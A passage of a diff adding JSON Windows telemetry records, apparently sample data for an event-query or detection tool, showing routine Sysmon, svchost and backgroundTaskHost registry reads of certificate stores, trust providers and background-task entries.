"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_value": 
"{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ActivationType", + "registry_value": "ActivationType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Conditions", + "registry_value": "Conditions", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Flags", + "registry_value": "Flags", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + 
"registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Name", + "registry_value": "Name", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TriggerEvent", + "registry_value": "TriggerEvent", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TaskEntryPoint", + "registry_value": "TaskEntryPoint", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageRelativeAppName", + "registry_value": "PackageRelativeAppName", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PsmActivationType", + "registry_value": "PsmActivationType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageFlags", + "registry_value": "PackageFlags", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ExtendedRegistrationData", + "registry_value": "ExtendedRegistrationData", + "timestamp": 131883571691990000, + "unique_pid": 
"{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventType", + "registry_value": "EventType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventType", + "registry_value": "EventType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", 
+ "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "threadpoolwinrt.dll", + "image_path": "C:\\Windows\\System32\\threadpoolwinrt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + 
"registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", + "registry_value": "ContentDeliveryManager.Background.WatchdogTask", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 